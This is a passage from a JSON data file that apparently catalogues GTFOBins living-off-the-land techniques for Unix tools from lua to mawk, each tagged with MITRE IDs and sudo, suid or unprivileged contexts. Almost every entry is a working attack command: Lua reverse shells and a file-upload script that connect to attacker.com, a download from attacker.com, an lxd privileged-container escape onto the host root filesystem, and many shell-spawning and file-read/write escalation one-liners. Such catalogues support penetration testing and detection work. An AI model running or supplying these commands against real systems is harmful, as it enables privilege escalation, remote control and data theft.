local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:reverse-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lua:upload:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"]},{"id":"gtfo:lualatex:inherit:0:sudo","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:lualatex:inherit:0:suid","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:lualatex:inherit:0:unprivileged","toolId":"gtfo:lualatex","toolName":"lualatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"lualatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lualatex/"]},{"id":"gtfo:luatex:inherit:0:sudo","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:luatex:inherit:0:suid","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:luatex:inherit:0:unprivileged","toolId":"gtfo:luatex","toolName":"luatex","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"luatex -shell-escape '\\directlua{...}\\end'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/luatex/"]},{"id":"gtfo:lwp-download:download:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:download:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lwp-download http://attacker.com/path/to/input-file /path/to/output-file","description":"The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-read:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-read:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-download file:///path/to/input-file /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:0:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:0:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nlwp-download file:///path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:1:sudo","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-download:file-write:1:unprivileged","toolId":"gtfo:lwp-download","toolName":"lwp-download","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lwp-download file:///path/to/input-file /path/to/output-file","description":"This actually copies a file to a destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-download/"]},{"id":"gtfo:lwp-request:file-read:0:sudo","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lwp-request/"]},{"id":"gtfo:lwp-request:file-read:0:unprivileged","toolId":"gtfo:lwp-request","toolName":"lwp-request","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lwp-request file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lwp-request/"]},{"id":"gtfo:lxd:shell:0:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:0:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc init ubuntu:16.04 x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"The image (e.g., `ubuntu:16.04`) must be present already, otherwise it will be downloaded.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:1:sudo","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:lxd:shell:1:suid","toolId":"gtfo:lxd","toolName":"lxd","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lxc image import ./alpine*.tar.gz --alias x\nlxc init x x -c security.privileged=true\nlxc config device add x x disk source=/ path=/mnt/ recursive=true\nlxc start x\nlxc exec x /bin/sh","description":"This requires steps to be run offline, then the resulting image must be uploaded to target. Build the local image with [lxd-alpine-builder](https://github.com/saghul/lxd-alpine-builder):\n\n```\ngit clone https://github.com/saghul/lxd-alpine-builder\ncd lxd-alpine-builder\nsudo ./build-alpine -a i686\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lxd/"]},{"id":"gtfo:m4:command:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:command:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:command:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo 'esyscmd(/path/to/command)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:file-read:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"m4 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:sudo","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:suid","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:m4:shell:0:unprivileged","toolId":"gtfo:m4","toolName":"m4","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/m4/"]},{"id":"gtfo:mail:shell:0:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:0:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:0:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail --exec='!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:sudo","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:suid","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:mail:shell:1:unprivileged","toolId":"gtfo:mail","toolName":"mail","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mail -f /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mail/"]},{"id":"gtfo:make:file-read:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-read:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-read:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"make -s --eval='$(file >/dev/stdout,$(file </path/to/input-file))' .","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:sudo","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:suid","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:file-write:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"make -s --eval='$(file >/path/to/output-file,DATA)' .","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:sudo","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:suid","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:make:shell:0:unprivileged","toolId":"gtfo:make","toolName":"make","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"make --eval='$(shell /bin/sh 1>&0)' .","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/make/"]},{"id":"gtfo:man:file-read:0:sudo","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:file-read:0:suid","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:file-read:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"man /path/to/input-file","description":"The file is shown somehow formatted and displayed in the default pager.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:sudo","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:suid","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:inherit:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"man man","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:sudo","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:suid","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:man:shell:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"]},{"id":"gtfo:mawk:file-read:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-read:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-read:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:file-write:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:mawk:shell:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mawk 'BEGIN 